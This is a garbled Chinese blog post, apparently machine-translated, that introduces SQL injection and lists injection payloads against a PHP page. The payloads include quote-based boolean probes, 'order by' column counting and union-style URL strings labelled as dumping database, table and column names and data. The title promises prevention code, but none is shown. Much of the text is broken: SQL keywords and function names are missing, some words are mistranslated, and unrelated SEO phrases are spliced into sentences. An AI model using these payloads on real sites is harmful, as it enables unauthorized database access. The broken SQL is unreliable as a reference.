網(wǎng)站安全之php防止注入攻擊代碼 一1.注入原理sql注入漏洞產(chǎn)生的原理(圖)防止sql注入 php
2022-12-25
一
1、注射原理
sql注入漏洞的原理是服務(wù)器沒有嚴(yán)格過濾用戶輸入的參數(shù)網(wǎng)站安全之php防止注入攻擊代碼,將包含惡意代碼的參數(shù)代入數(shù)據(jù)庫查詢語句中執(zhí)行。
二、sql注入常用的函數(shù)和語法
顯示所有查詢結(jié)果,占用一個(gè)顯示空間
():
查詢版本
():
查詢數(shù)據(jù)庫用戶名
用戶():
查詢數(shù)據(jù)庫名稱
():
查詢數(shù)據(jù)庫的絕對路徑
@@():
@@:查詢操作系統(tǒng)版本
():查詢當(dāng)前用戶
by:要查找的列數(shù)
:聯(lián)合查詢(聯(lián)合查詢的條件是不能查詢到前一條語句且字段數(shù)與上一條語句查詢字段數(shù)相同)
:限制顯示個(gè)數(shù)(例如:0 2表示從第一個(gè)開始顯示兩個(gè))
3.注入實(shí)例
環(huán)境:win7+
部分代碼實(shí)現(xiàn)(文件保存為sql.php)
數(shù)據(jù)庫代碼
測試; // 創(chuàng)建數(shù)據(jù)庫測試
(id int, 名稱 (10), (15)); // 創(chuàng)建表
進(jìn)入(1網(wǎng)站模板,'哈哈','哈哈');
into(2,'xixi','xixi'); //插入數(shù)據(jù)
數(shù)字型:and 1=1;and 1=2 判斷是否存在注入 字符型:' and '1'='1 ' and '1'='2 搜索型: 關(guān)鍵字%' and 1=1 and '%'='% ; 關(guān)鍵字%' and 1=2 and '%'='%
?id=1' order by 3 --+ //判斷字段數(shù)
?id=-1' 1,(),3 來自 . --+
要么
?id=-1' 1,( from . 0,1),3 --+ // 爆庫
?id=-1' 1,( from .='數(shù)據(jù)庫名' 0,1),3 --+ //爆表
?id=-1' 1,( from . ='數(shù)據(jù)庫名' and ='表名' 0,1),3 --+ // 爆字段
?id=-1' 1, ( from . 0,1), 3 --+ // 突發(fā)數(shù)據(jù)
喜歡黑客技術(shù)的可以關(guān)注我網(wǎng)站安全之php防止注入攻擊代碼網(wǎng)站制作,
每天都會(huì)發(fā)布相應(yīng)的教程
謝謝大家~~~~~